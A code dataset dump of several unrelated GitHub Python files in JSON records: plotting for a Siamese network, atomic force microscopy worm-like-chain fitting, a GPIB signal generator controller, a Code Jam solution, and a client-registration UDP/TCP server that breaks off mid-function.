tuple(batch_data[:2])","repo_name":"FreeformRobotics/Active_room_segmentation","sub_path":"detr_door_detection/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1667,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} +{"seq_id":"36744121083","text":"# -*- coding: utf-8 -*-\n# @File : visualization.py\n# @Author: Runist\n# @Time : 2020/5/19 14:50\n# @Software: PyCharm\n# @Brief: 样本数据、训练过程可视化\nimport os\nimport re\nfrom matplotlib import pyplot as plt\nimport tensorflow as tf\nimport numpy as np\nimport cv2 as cv\n\nfrom dataReader import SiameseLoader\nfrom main import siamese_network\nimport config as cfg\n\n\ndef gen_class_names(base_class_name):\n \"\"\"\n 生成分类名字的列表\n :param base_class_name: 分类名的前缀\n :return:\n \"\"\"\n classes = []\n for i in range(1, 21):\n if i < 10:\n classes.append(\"{}0{}\".format(base_class_name, i))\n else:\n classes.append(\"{}{}\".format(base_class_name, i))\n return classes\n\n\ndef generate_one_hot_encoding(classes):\n \"\"\"\n 利用sklearn中的preprocessing包快速生成onehot编码\n :param classes: 分类的名字\n :return: 生成的onehot编码列表\n \"\"\"\n encoder = LabelBinarizer()\n transfomed_labels = encoder.fit_transform(classes)\n\n return transfomed_labels\n\n\ndef plot_images(path):\n \"\"\"\n 绘制一种语言的某个字符的所有20个样本\n \"\"\"\n f, axarr = plt.subplots(5, 4, figsize=(10, 10))\n images_list = []\n for image in os.listdir(path):\n image_path = os.path.join(path, image)\n img = cv.imread(image_path)\n images_list.append(img)\n\n for i in range(5):\n for j in range(4):\n axarr[i, j].imshow(images_list.pop())\n\n plt.show()\n\n\ndef nearest_neighbour_correct(image_group, labels):\n \"\"\"\n 计算L2距离,以欧式距离作为衡量标准\n :param image_group: 测试集\n :param labels:\n :return:\n \"\"\"\n L2_distances = np.zeros_like(labels)\n for i in range(len(labels)):\n L2_distances[i] = np.sum(np.sqrt(image_group[0][i]**2 - image_group[1][i]**2))\n\n if np.argmin(L2_distances) == np.argmax(labels):\n return 1\n return 0\n\n\ndef test_nn_accuracy(N_ways, num, loader):\n \"\"\"\n 测试one shot的准确率\n :param N_ways: 测试的种类\n :param num: 测试的数量\n :param loader: 数据加载器\n :return: 准确率\n \"\"\"\n print(\"Evaluating nearest neighbour on {} unique {} way one-shot learning tasks ...\".format(num, N_ways))\n\n correct = 0\n\n for i in range(num):\n image_group, labels = loader.make_oneshot_task(N_ways, \"valid\")\n correct += nearest_neighbour_correct(image_group, labels)\n\n return 100.0 * correct / num\n\n\ndef test_nn_and_siamese(weight_path, curves_path):\n \"\"\"\n 测试knn和孪生网络在测试集上的表现\n :param weight_path: 模型路径\n :param curves_path: 曲线数据存储路径\n :return:\n \"\"\"\n ways = np.arange(1, 30, 2)\n valid_accs, train_accs, nn_accs = [], [], []\n test_num = 2\n\n # another_strategy = tf.distribute.MirroredStrategy()\n # with another_strategy.scope():\n model = siamese_network()\n model.load_weights(weight_path)\n\n for N in ways:\n train_accs.append(loader.test_oneshot(model, N, test_num, \"train\"))\n valid_accs.append(loader.test_oneshot(model, N, test_num, \"valid\"))\n nn_accs.append(test_nn_accuracy(N, test_num, loader))\n\n # 把数据保存下来,服务器上不好显示,在本机显示图像\n with open(curves_path, 'w') as f:\n f.write(\"[train_acc]\\n\")\n for acc in train_accs:\n f.write(\"{:.2f},\".format(acc))\n\n f.write(\"\\n[valid_accs]\\n\")\n for acc in valid_accs:\n f.write(\"{:.2f},\".format(acc))\n\n f.write(\"\\n[nn_accs]\\n\")\n for acc in nn_accs:\n f.write(\"{:.2f},\".format(acc))\n\n\ndef randomcolor():\n \"\"\"\n 随机生成颜色\n :return:\n \"\"\"\n colorArr = ['1', '2', '3', '4', '5', '6', '7', '8', '9', 'A', 'B', 'C', 'D', 'E', 'F']\n color = \"#\"\n for i in range(6):\n color += colorArr[np.random.randint(0, 14)]\n return color\n\n\ndef plot_curves(file):\n \"\"\"\n 根据txt文件来生成图标,可视化显示结果\n :param file: txt文件\n :return: None\n \"\"\"\n with open(file, 'r') as f:\n content = f.read()\n name = re.findall(r\"([a-z_a-z]+)\", content)\n data = re.findall(r\"(.*)[\\d]\", content)\n\n history = {}\n for i in range(len(data)):\n # 按照,分割数字后,映射成浮点数\n history[name[i]] = list(map(float, data[i].split(\",\")))\n\n for key, values in history.items():\n plt.plot(range(0, len(values)), values, color=randomcolor())\n\n plt.legend(history.keys(), loc=0)\n plt.show()\n\n\nif __name__ == '__main__':\n loader = SiameseLoader(cfg.data_path)\n\n # plot_images(os.path.join(cfg.data_path, 'images_background/Arcadian/character03/'))\n\n test_curves = cfg.summary_path + \"test_curves.txt\"\n train_curves = cfg.summary_path + \"train_curves.txt\"\n # test_nn_and_siamese(cfg.model_path, test_curves)\n\n plot_curves(test_curves)\n # plot_curves(train_curves)\n","repo_name":"Runist/SiameseNet","sub_path":"visualization.py","file_name":"visualization.py","file_ext":"py","file_size_in_byte":4926,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"16601180508","text":"# force floating point division. Can still use integer with //\nfrom __future__ import division\n# This file is used for importing the common utilities classes.\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport sys\nsys.path.append(\"../../../../../\")\nfrom Research.Perkins.AnalysisUtil.ForceExtensionAnalysis import FEC_Util,\\\n FEC_Plot\nfrom Research.Perkins.AnalysisUtil.ForceExtensionAnalysis.DataCorrection.\\\n CorrectionMethods import CorrectForcePullByMetaInformation\n\nfrom FitUtil.WormLikeChain.Python.Code.WLC_Fit import BoundedWlcFit\nfrom FitUtil.FitUtils.Python.FitClasses import GetBoundsDict\nfrom GeneralUtil.python import PlotUtilities as pPlotUtil\nfrom GeneralUtil.python import CheckpointUtilities as pCheckUtil\nimport copy\nfrom GeneralUtil.python.IgorUtil import SavitskyFilter\n\n\ndef ReadInData(FullName):\n mObjs = FEC_Util.ReadInData(FullName)\n return mObjs\n\ndef run():\n \"\"\"\n Runs contour length analysis\n \"\"\"\n OutFile = \"\"\n Limit = 2\n FullNames = [\"2016_7_10_1ng_ul_50C_4hour_depo_circ_dna_Strept_tip_I.pxp\",\n \"2016_7_10_1ng_ul_50C_4hour_depo_circ_dna_Strept_tip_II.pxp\"]\n DataArray = []\n for i,Name in enumerate(FullNames):\n DataArray.extend(pCheckUtil.getCheckpoint(\"Tmp{:d}.pkl\".format(i),\n ReadInData,False,Name))\n NoTriggerDistance = 200e-9\n for Tmp in DataArray:\n idx = 0\n Corrected,_ = CorrectForcePullByMetaInformation(Tmp)\n Sep = Tmp.Separation\n Tmp = Corrected\n # work with the corrected version\n Approach,Retract = FEC_Util.GetApproachRetract(Tmp)\n EntireRetract = FEC_Util.\\\n GetFECPullingRegion(Retract,MetersAfterTouchoff=None,\n Correct=True)\n FilterFactor =10\n NFilterPoints = int(np.ceil(EntireRetract.Force.size/FilterFactor))\n FilteredForce = FEC_Util.GetFilteredForce(EntireRetract,NFilterPoints)\n FilteredForceGradient = SavitskyFilter(np.gradient(FilteredForce.Force),\n NFilterPoints)\n OnlyPositive = FilteredForceGradient[np.where(FilteredForceGradient>0)]\n q75, q25 = np.percentile(OnlyPositive, [75 ,25])\n iqr = q75-q25\n IsOutlier = lambda x: x > q75 + 1.5 * iqr\n FirstOutlier = np.where(IsOutlier(FilteredForceGradient))[0][0]\n MaxIdx = np.argmax(FilteredForceGradient)\n IdxArr = np.arange(0,FilteredForceGradient.size)\n SeparationRelativeRetract = EntireRetract.Separation\n SeparationRelativeRetract -= SeparationRelativeRetract[0]\n # first worm like chain ends where we past the max no longer an outlier\n Outliers = np.where( ~IsOutlier(FilteredForceGradient) &\n (IdxArr > FirstOutlier) &\n (SeparationRelativeRetract > NoTriggerDistance))\n EndOfFirstWLC = Outliers[0][0]\n MetersAfterTouchoff = SeparationRelativeRetract[EndOfFirstWLC]\n NearSurface = FEC_Util.\\\n GetFECPullingRegion(Retract,\n MetersAfterTouchoff=MetersAfterTouchoff)\n Bounds = GetBoundsDict(**dict(Lp=[20e-9,60e-9],\n L0=[100e-9,700e-9],\n K0=[1000e-12,1400e-12],\n kbT=[0,np.inf]))\n SepNear = NearSurface.Separation\n ForceNear = NearSurface.Force\n Fit = BoundedWlcFit(SepNear,ForceNear,VaryL0=True,VaryLp=True,Ns=20,\n Bounds=Bounds)\n Pred = Fit.Predict(SepNear)\n # the fit was to 'NearSurface', which is zeroed. There can be an offset\n # due to hydrodynamic drag on the cantilever (typically <20pN)\n # to find this (in order for the retract-offsetted WLC fit to match),\n # we each\n Appr,Retr = FEC_Util.SplitAndProcess(Tmp)\n # how much of the retract should we use to figure out the zero?\n fraction = 0.05\n N = int(np.ceil(fraction*Retr.Force.size))\n # get the two zeros, and offset the fit by their different (retract\n # should almost certainly be higher)\n ZeroAppr = np.median(Appr.Force[:N])\n ZeroRetr = np.median(Retr.Force[-N:])\n Offset = ZeroRetr - ZeroAppr\n # offset the WLC \n Pred += Offset\n # plot the data and the prediction\n fig = pPlotUtil.figure()\n FEC_Plot.FEC(Tmp)\n # now plot some meta information. The expected overstretch\n ExpectedOverstretch_pN = 65\n plt.axhline(ExpectedOverstretch_pN,\n linewidth=3.0,color='k',linestyle=\"--\",label=\"65pN\")\n ToNm = lambda x: x*1e9\n ToPn = lambda x: x*1e12\n # get the contour length (L0) and the persistence length (Lp) in nm\n # and as integers (ie: dont care about 2%\n L0_nm = int(ToNm(Fit.Info.ParamVals.ParamDict[\"L0\"].Value))\n Lp_nm = int(ToNm(Fit.Info.ParamVals.ParamDict[\"Lp\"].Value))\n # plot the WLC prediction, label...\n \"\"\"\n plt.plot(ToNm(SepNear),ToPn(Pred),color='g',linestyle='--',\n linewidth=5.0,\n label=\"WLC (Extensible)\\n\")\n \"\"\"\n pPlotUtil.legend(frameon=True)\n # note: limits are in nm and pN\n MaxY_pN = np.max(ToPn(Pred[np.where(np.isfinite(Pred))]))\n MaxY_pN = max(MaxY_pN,ToPn(np.max(Retr.Force)))\n MinY_pN = -MaxY_pN/5\n plt.ylim([-40,MaxY_pN])\n plt.xlim([-20,plt.xlim()[-1]])\n Name = \"WLC\" + Tmp.Meta.Name\n pPlotUtil.savefig(fig,Name + \".png\")\n # Read in the pxp (assume each 'name-group' with the same numerical\n # suffix represents a valid wave with a WLC of interest)\n \n \n\nif __name__ == \"__main__\":\n run()\n","repo_name":"prheenan/Research","sub_path":"Perkins/Projects/CircularDNA/2016_6_10_ContourLengthAnalysis/MainContourLength.py","file_name":"MainContourLength.py","file_ext":"py","file_size_in_byte":5829,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"27675722336","text":"from plx_gpib_ethernet import PrologixGPIBEthernet\n\n# scraps to control a gigatronics 2520A signal generator\n\nGPIB_ADDR_2520A = 6\n\nclass Gigatronics2520A():\n def __init__(self, prologix = False, gpib_addr = GPIB_ADDR_2520A):\n if not prologix:\n self.gpib = PrologixGPIBEthernet('192.168.1.128')\n self.gpib.connect()\n else:\n self.gpib = prologix\n\n self.gpib_addr = gpib_addr\n\n self.gpib.select(self.gpib_addr)\n self.gpib.write('*RST')\n assert '2520A' in self.gpib.query('*IDN?')\n\n def set_cw_frequency(self, freq):\n self.gpib.select(self.gpib_addr)\n self.gpib.write('SOURCE:FREQUENCY:FIX {}HZ'.format(str(int(freq))))\n f_readback = float(self.gpib.query('SOURCE:FREQUENCY?'))\n assert f_readback == freq\n\n def set_cw_power(self, power_dbm):\n self.gpib.select(self.gpib_addr)\n self.gpib.write('SOURCE:POWER:LEVEL:IMM:AMPLITUDE {}DBM'.format(str(int(power_dbm))))\n p_readback = float(self.gpib.query('SOURCE:POWER:LEVEL:IMM:AMPLITUDE?'))\n assert int(p_readback) == power_dbm\n\n def output_on(self):\n self.gpib.select(self.gpib_addr)\n self.gpib.write('OUTPUT ON')\n assert float(self.gpib.query('OUTPUT:STATE?')) == 1\n\n def output_off(self):\n self.gpib.select(self.gpib_addr)\n self.gpib.write('OUTPUT OFF')\n assert float(self.gpib.query('OUTPUT:STATE?')) == 0\n\nif __name__ == '__main__':\n synth = Gigatronics2520A()\n\n synth.set_cw_frequency(2.5e9)\n synth.set_cw_power(-10)\n synth.output_on()\n\n\n\n \n\n \n\n","repo_name":"loxodes/lab_automation","sub_path":"equipment/gigatronics_2520a.py","file_name":"gigatronics_2520a.py","file_ext":"py","file_size_in_byte":1603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23450700731","text":"\"\"\"\nInput\n4\n4 11111\n1 09\n5 110011\n0 1\n\nOutput\nCase #1: 0\nCase #2: 1\nCase #3: 2\nCase #4: 0\n\"\"\"\n\nimport sys\n\ndef read(filen, fileout):\n T = 0\n cases = []\n trial = 0\n with open(filen) as f:\n with open(fileout, 'w') as fout:\n T = int(f.readline())\n for line in f:\n if len(line.split()) > 1:\n trial += 1\n s_max = int(line.split()[0])\n s = [ int(i) for i in list(line.split()[1]) ]\n ans = solve_it(s_max, s)\n fout.write('Case #{0}: {1}\\n'.format(trial,ans))\n\ndef solve_it(s_max, s):\n curr_s = 0 # The initial amount of 'ovation'\n needed = 0 # How many more ovations we need\n for i in range(len(s)):\n if i > curr_s: # There's not enough ovation for the remainder to stand\n needed += i-curr_s\n curr_s += i-curr_s # In the case that there were enough...\n curr_s += s[i]\n return needed\n \ndef main(filen, fileout):\n read(filen, fileout)\n \n\n\nif __name__ == '__main__':\n if len(sys.argv) == 3:\n main(sys.argv[1], sys.argv[2])\n else:\n print('Wrong number of arguments')\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_155/1988.py","file_name":"1988.py","file_ext":"py","file_size_in_byte":1080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6446365950","text":"#!/usr/bin/env python3\nimport struct\nimport sys\nfrom dataclasses import dataclass\nfrom dataclasses import field\nimport servermodule\nimport threading\nimport socket\nimport random\nimport select\nimport time\n\n\n# Colors Class for formatting purposes\nclass Colors:\n HEADER = '\\033[95m'\n BLUE = '\\033[94m'\n CYAN = '\\033[96m'\n GREEN = '\\033[92m'\n WARNING = '\\033[93m'\n FAIL = '\\033[91m'\n END = '\\033[0m'\n BOLD = '\\033[1m'\n UNDERLINE = '\\033[4m'\n\n\n# Dataclasses\n@dataclass\nclass ServerCfg:\n Id: str\n UDP: int\n TCP: int\n mainTCP: socket.socket\n mainUDP: socket.socket\n\n\n@dataclass\nclass Element:\n Id: str\n Value: str = \"None\"\n\n def isFrom(self, client):\n for i in range(len(client.Elements)):\n if client.Elements[i].Id == self.Id:\n return True\n return False\n\n def store(self, client, date, packetType):\n for i in range(len(client.Elements)):\n if client.Elements[i].Id == self.Id:\n client.Elements[i].Value = self.Value\n dataFile = open(client.Id + \".data\", \"a\")\n dataFile.write(date.split(\";\")[0] + \";\" + date.split(\";\")[1] + \";\" + typeToString(\n packetType) + \";\" + self.Id + \";\" + self.Value + \"\\n\")\n okMsg(\"Successfully stored element \" + self.Id + \" value: \" + self.Value + \" for client \" + client.Id)\n dataFile.close()\n\n\n@dataclass\nclass Client:\n Id: str\n Status: str = servermodule.DISCONNECTED\n Id_Comm: str = \"\"\n IP_Address: str = \"\"\n defaultUDPort: int = 0\n firstALIVE: bool = True\n ALIVEReceived: bool = False\n ALIVELost: int = 0\n ALIVETimer: threading.Thread = None\n newUDPort: int = 0\n TCP: int = 0\n Elements: list[Element] = field(default_factory=list)\n\n def setStatus(self, status):\n self.Status = status\n infoMsg(\"Client with id \" + str(self.Id) + \" in status \" + statusToString(self.Status))\n\n def resetALIVE(self):\n self.firstALIVE = True\n self.ALIVEReceived = False\n self.ALIVELost = 0\n\n\n@dataclass\nclass UDP_PDU:\n Type: str\n Id_Trans: str\n Id_Comm: str\n Data: str\n\n def send(self, socketToSend, client, port):\n packetPacked = packUDP(self)\n bytesSent = socketToSend.sendto(packetPacked, (client.IP_Address, port))\n while bytesSent != UDPPacketSize: # 84 = size of UDP_PDU\n bytesSent += socketToSend.sendto(packetPacked[bytesSent:], (client.IP_Address, port))\n debugMsg(\"Packet \" + typeToString(self.Type) + \" sent correctly to \" + client.Id)\n\n def incorrectALIVE(self, client):\n if str(self.Id_Trans) != client.Id or self.Id_Comm != str(client.Id_Comm) or self.Data != \"\":\n return True\n return False\n\n\n@dataclass\nclass TCP_PDU:\n Type: str\n Id_Trans: str\n Id_Comm: str\n Element: str\n Value: str\n Info: str\n\n def send(self, socketToSend: socket.socket, client):\n packetPacked = packTCP(self)\n socketToSend.sendall(packetPacked)\n debugMsg(\"Packet \" + typeToString(self.Type) + \" sent correctly to \" + client.Id)\n\n\n# Constants\nUDPPacketSize = 84\nTCPPacketSize = 1 + 11 + 11 + 8 + 16 + 80\nZ = 2\nT = 1\nW = 3\nX = 3\nM = 3\nV = 2\nS = 3\n\n# Global variables\nserverCfg = ServerCfg\ncfgFile = \"server.cfg\"\nauthFile = \"bbdd_dev.dat\"\ndebug_mode = False\nclients = []\n\n\n# CHECK PARAMETERS FUNCTIONS\n\ndef checkParams():\n i = 1\n while i < len(sys.argv):\n if sys.argv[i] == \"-d\":\n global debug_mode\n debug_mode = True\n elif sys.argv[i] == \"-c\":\n if i + 1 <= len(sys.argv) and checkCfgFile(sys.argv[i + 1]):\n global cfgFile\n cfgFile = sys.argv[i + 1]\n else:\n errorMsg(\"Wrong config file name entered (filename.cfg)\")\n exit(-1)\n i += 1\n elif sys.argv[i] == \"-u\":\n if i + 1 <= len(sys.argv) and checkAuthFile(sys.argv[i + 1]):\n global authFile\n authFile = sys.argv[i + 1]\n else:\n errorMsg(\"Wrong authorized clients file name entered (filename.dat)\")\n exit(-1)\n i += 1\n else:\n errorMsg(\"Wrong program parameters entered\")\n exit(-1)\n i += 1\n\n\ndef checkCfgFile(filename):\n if filename.find(\".cfg\") < 0:\n return False\n return True\n\n\ndef checkAuthFile(filename):\n if filename.find(\".dat\") < 0:\n return False\n return True\n\n\n# READING CONFIGURATION FUNCTIONS\n\ndef readCfgFile():\n file = open(cfgFile, \"r\")\n lines = file.read().splitlines()\n global serverCfg\n for i in range(len(lines)):\n if lines[i].startswith(\"Id\") > 0:\n Id = lines[i].split(\" \")[2]\n serverCfg.Id = Id\n elif lines[i].startswith(\"UDP\") > 0:\n UDP = lines[i].split(\" \")[2]\n serverCfg.UDP = UDP\n elif lines[i].startswith(\"TCP\") > 0:\n TCP = lines[i].split(\" \")[2]\n serverCfg.TCP = TCP\n\n\ndef readAuthFile():\n file = open(authFile, \"r\")\n lines = file.read().splitlines()\n global clients\n for i in range(len(lines)):\n client = Client(lines[i])\n clients.append(client)\n\n\n# SERVER INITIALIZATION\n\ndef startServer():\n mainUDPSocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n mainUDPSocket.bind(('', int(serverCfg.UDP)))\n\n mainTCPSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n mainTCPSocket.bind(('', int(serverCfg.TCP)))\n\n mainUDPThread = threading.Thread(target=handleUDPConnections, args=(mainUDPSocket,))\n mainUDPThread.daemon = True\n mainTCPThread = threading.Thread(target=handleTCPConnections, args=(mainTCPSocket,))\n mainTCPThread.daemon = True\n\n serverCfg.mainUDP = mainUDPSocket\n serverCfg.mainTCP = mainTCPSocket\n\n mainUDPThread.start()\n mainTCPThread.start()\n handleTerminalInput()\n\n\n# UDP FUNCTIONS\n\ndef handleUDPConnections(mainUDPSocket: socket.socket): # HANDLING UDP CONNECTIONS AND THREAD EVERY NEW CONNECTION.\n while 1:\n (bytesReceived, (ip, port)) = mainUDPSocket.recvfrom(UDPPacketSize, socket.MSG_WAITALL)\n debugMsg(\"New thread created for attending UDP\")\n clientUDPThread = threading.Thread(target=switcher, args=(bytesReceived, ip, port, mainUDPSocket,))\n clientUDPThread.start()\n\n\ndef switcher(bytesPacket, ip, port, mainUDPSocket):\n packet = unpackUDP(bytesPacket)\n\n if not packetFromAuthedUser(packet):\n debugMsg(\"Received a packet from unknown user\")\n sendREG_REJ(mainUDPSocket, ip, port, \"Client with id: \" + packet.Id_Trans + \" not authed in server\")\n return\n\n client = searchClient(packet.Id_Trans)\n client.IP_Address = ip\n client.defaultUDPort = port\n\n if packet.Type == servermodule.REG_REQ:\n client.resetALIVE()\n handleRegisterRequest(packet, mainUDPSocket, client)\n elif packet.Type == servermodule.ALIVE:\n handlePeriodicCommunication(packet, mainUDPSocket, client)\n else:\n debugMsg(\"Error packet type received: \" + typeToString(\n packet.Type) + \" with client \" + client.Id + \" in status \" + statusToString(\n client.Status))\n client.setStatus(servermodule.DISCONNECTED)\n\n\ndef packUDP(packet: UDP_PDU):\n packedPacket = struct.pack(\"B 11s 11s 61s\", packet.Type, str(packet.Id_Trans).encode(),\n str(packet.Id_Comm).encode(), str(packet.Data).encode())\n return packedPacket\n\n\ndef unpackUDP(bytesReceived: bytes):\n unpackedPacket = struct.unpack('B 11s 11s 61s', bytesReceived)\n packetType = unpackedPacket[0]\n packetId_Trans = unpackedPacket[1].split(b\"\\x00\")[0].decode()\n packetId_Comm = unpackedPacket[2].split(b\"\\x00\")[0].decode()\n packetData = unpackedPacket[3].split(b\"\\x00\")[0].decode()\n return UDP_PDU(packetType, packetId_Trans, packetId_Comm, packetData)\n\n\ndef handleRegisterRequest(REG_REQPacket, mainUDPSocket, client: Client):\n if REG_REQPacket.Id_Comm != \"0000000000\" or REG_REQPacket.Data != \"\":\n if REG_REQPacket.Data != \"\":\n debugMsg(\"Received a REG_REQ packet [DATA NOT EMPTY]\")\n sendREG_REJ(mainUDPSocket, client.IP_Address, client.defaultUDPort,\n \"Wrong information in packet REG_REQ [DATA NOT EMPTY]\")\n else:\n debugMsg(\"Received a REG_REQ packet [WRONG ID COMMUNICATION]\")\n sendREG_REJ(mainUDPSocket, client.IP_Address, client.defaultUDPort,\n \"Wrong information in packet REG_REQ [WRONG ID COMMUNICATION]\")\n client.setStatus(servermodule.DISCONNECTED)\n return\n\n debugMsg(\"Correct REG_REQ packet received from client \" + client.Id)\n\n if client.Status != servermodule.DISCONNECTED:\n sendREG_REJ(mainUDPSocket, client.IP_Address, client.defaultUDPort,\n \"Client with id: \" + client.Id + \" it's not in status DISCONNECTED\")\n client.setStatus(servermodule.DISCONNECTED)\n return\n\n Id_Comm = random.randint(1000000000, 9999999999)\n client.Id_Comm = Id_Comm\n\n clientUDPSocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n clientUDPSocket.bind((\"\", 0))\n newUDPPort = clientUDPSocket.getsockname()[1]\n client.newUDPort = newUDPPort\n\n sendREG_ACK(mainUDPSocket, client)\n debugMsg(\"Opened new UDP-Port (\" + str(newUDPPort) + \") for client \" + client.Id)\n\n client.setStatus(servermodule.WAIT_INFO)\n inputs, outputs, excepts = select.select([clientUDPSocket], [], [], Z * T)\n if len(inputs) == 0:\n debugMsg(\"REG_INFO packet not received from client \" + client.Id)\n client.setStatus(servermodule.DISCONNECTED)\n clientUDPSocket.close()\n return\n\n (REG_INFOBytes, (_, _)) = clientUDPSocket.recvfrom(UDPPacketSize, socket.MSG_WAITALL)\n REG_INFOPacket = unpackUDP(REG_INFOBytes)\n\n if REG_INFOPacket.Type != servermodule.REG_INFO:\n debugMsg(\"Error packet type received: \" + typeToString(\n REG_INFOPacket.Type) + \" with client \" + client.Id + \" in status \" + statusToString(\n client.Status))\n client.setStatus(servermodule.DISCONNECTED)\n clientUDPSocket.close()\n return\n\n if REG_INFOPacket.Id_Trans != str(client.Id) or REG_INFOPacket.Id_Comm != str(Id_Comm) or len(\n REG_INFOPacket.Data) < 7:\n if REG_INFOPacket.Id_Trans != str(client.Id):\n debugMsg(\"Wrong information in packet REG_INFO from client \" + client.Id + \"[WRONG ID TRANSMITTER]\")\n sendINFO_NACK(clientUDPSocket, client, \"Wrong information in packet REG_INFO [WRONG ID TRANSMITTER]\")\n elif REG_INFOPacket.Id_Comm != str(Id_Comm):\n debugMsg(\"Wrong information in packet REG_INFO from client \" + client.Id + \"[WRONG ID COMMUNICATION]\")\n sendINFO_NACK(clientUDPSocket, client, \"Wrong information in packet REG_INFO [WRONG ID COMMUNICATION]\")\n else:\n debugMsg(\"Wrong information in packet REG_INFO from client \" + client.Id + \"[WRONG ELEMENT INFO]\")\n sendINFO_NACK(clientUDPSocket, client, \"Wrong information in packet REG_INFO [WRONG ELEMENT INFO]\")\n client.setStatus(servermodule.DISCONNECTED)\n clientUDPSocket.close()\n return\n\n debugMsg(\"Correct REG_INFO packet received from \" + client.Id)\n storeREG_INFOData(REG_INFOPacket.Data, client)\n\n sendINFO_ACK(clientUDPSocket, client)\n client.setStatus(servermodule.REGISTERED)\n clientALIVETimer = threading.Thread(target=ALIVETimer, args=(client,))\n client.ALIVETimer = clientALIVETimer\n clientALIVETimer.start()\n debugMsg(\"Started new ALIVE timer for client \" + client.Id + \" with name \" + clientALIVETimer.name)\n clientUDPSocket.close()\n\n\ndef sendREG_ACK(socketToSend, client: Client):\n REG_ACKPacket = UDP_PDU(servermodule.REG_ACK, serverCfg.Id, client.Id_Comm, str(client.newUDPort))\n REG_ACKPacket.send(socketToSend, client, client.defaultUDPort)\n\n\ndef sendINFO_ACK(socketToSend, client):\n INFO_ACKPacket = UDP_PDU(servermodule.INFO_ACK, serverCfg.Id, client.Id_Comm, str(serverCfg.TCP))\n INFO_ACKPacket.send(socketToSend, client, client.defaultUDPort)\n\n\ndef sendINFO_NACK(socketToSend, client, reason):\n INFO_NACKPacket = UDP_PDU(servermodule.INFO_NACK, serverCfg.Id, client.Id_Comm, reason)\n INFO_NACKPacket.send(socketToSend, client, client.defaultUDPort)\n\n # END OF REGISTER PROCESS\n\n\ndef storeREG_INFOData(data, client: Client):\n client.TCP = data.split(\",\")[0]\n for i in range(len(data.split(\";\"))):\n element = Element(data.split(\",\")[1].split(\";\")[i], \"\")\n client.Elements.append(element)\n\n\ndef sendREG_REJ(socketToSend, ip, port, reason):\n REG_REJPacket = UDP_PDU(servermodule.REG_REJ, serverCfg.Id, \"0000000000\", reason)\n REG_REJPacked = packUDP(REG_REJPacket)\n bytesSent = socketToSend.sendto(REG_REJPacked, (ip, port))\n while bytesSent != UDPPacketSize:\n bytesSent += socketToSend.sendto(REG_REJPacked[bytesSent:], (ip, port))\n debugMsg(\"Packet REG_REJ sent correctly to \" + str(ip) + \":\" + str(port))\n\n\ndef handlePeriodicCommunication(ALIVE: UDP_PDU, mainUDPSocket: socket.socket, client: Client):\n if ALIVE.incorrectALIVE(client):\n debugMsg(\"Incorrect ALIVE packet received from \" + client.Id)\n sendALIVE_REJ(mainUDPSocket, client)\n client.setStatus(servermodule.DISCONNECTED)\n return\n\n if client.firstALIVE and client.Status == servermodule.REGISTERED:\n debugMsg(\"Correct first ALIVE packet received from client \" + client.Id)\n client.setStatus(servermodule.SEND_ALIVE)\n client.firstALIVE = False\n elif not client.firstALIVE and client.Status == servermodule.SEND_ALIVE:\n debugMsg(\"Correct ALIVE packet received from client \" + client.Id)\n else:\n debugMsg(\"Error packet type received: \" + typeToString(\n ALIVE.Type) + \" with client \" + client.Id + \" in status \" + statusToString(\n client.Status))\n return\n\n client.ALIVEReceived = True\n sendALIVE(mainUDPSocket, client)\n\n\ndef ALIVETimer(client: Client):\n if client.firstALIVE:\n time.sleep(W)\n if not client.ALIVEReceived and client.Status == servermodule.REGISTERED:\n debugMsg(\"First ALIVE packet not received from client \" + client.Id)\n client.setStatus(servermodule.DISCONNECTED)\n return\n\n while client.ALIVELost < S and client.Status == servermodule.SEND_ALIVE:\n if client.ALIVETimer.name != threading.current_thread().name:\n debugMsg(\"Thread ALIVE timer with name \" + threading.current_thread().name + \" exited\")\n return\n time.sleep(V)\n if client.ALIVEReceived:\n client.ALIVEReceived = False\n client.ALIVELost = 0\n elif not client.ALIVEReceived:\n client.ALIVELost += 1\n debugMsg(\"Total ALIVE lost: \" + str(client.ALIVELost))\n if client.ALIVELost == 3:\n client.setStatus(servermodule.DISCONNECTED)\n\n\ndef sendALIVE(socketToSend, client: Client):\n ALIVEPacket = UDP_PDU(servermodule.ALIVE, serverCfg.Id, client.Id_Comm, client.Id)\n ALIVEPacket.send(socketToSend, client, client.defaultUDPort)\n\n\ndef sendALIVE_REJ(socketToSend, client: Client):\n ALIVE_REJPacket = UDP_PDU(servermodule.ALIVE_REJ, serverCfg.Id, client.Id_Comm, \"Incorrect ALIVE received\")\n ALIVE_REJPacket.send(socketToSend, client, client.defaultUDPort)\n\n\n# TCP FUNCTIONS\n\ndef handleTCPConnections(mainTCPSocket: socket.socket):\n while 1:\n mainTCPSocket.listen(1)\n (clientTCPSocket, (ip, port)) = mainTCPSocket.accept()\n debugMsg(\"New thread created for attending TCP in port\" + str(port))\n clientTCPThread = threading.Thread(target=handleTCPConnection, args=(clientTCPSocket, ip, port,))\n clientTCPThread.start()\n\n\ndef handleTCPConnection(clientSocket: socket.socket, ip, port):\n inputs, outputs, excepts = select.select([clientSocket], [], [], M)\n if len(inputs) == 0:\n debugMsg(\"Packet not received from \" + str(ip) + \":\" + str(port) + \" via TCP\")\n clientSocket.close()\n return\n\n bytesReceived = clientSocket.recv(TCPPacketSize, socket.MSG_WAITALL)\n\n packetReceived = unpackTCP(bytesReceived)\n\n if packetReceived.Type != servermodule.SEND_DATA:\n debugMsg(\"Packet of type \" + packetReceived.Type + \" received from TCP connection!\")\n clientSocket.close()\n return\n\n if not packetFromAuthedUser(packetReceived):\n debugMsg(\"Received a packet from unknown user via TCP\")\n DATA_REJ = TCP_PDU(servermodule.DATA_REJ, serverCfg.Id, \"0000000000\", \"\", \"\", \"Wrong client Id\")\n 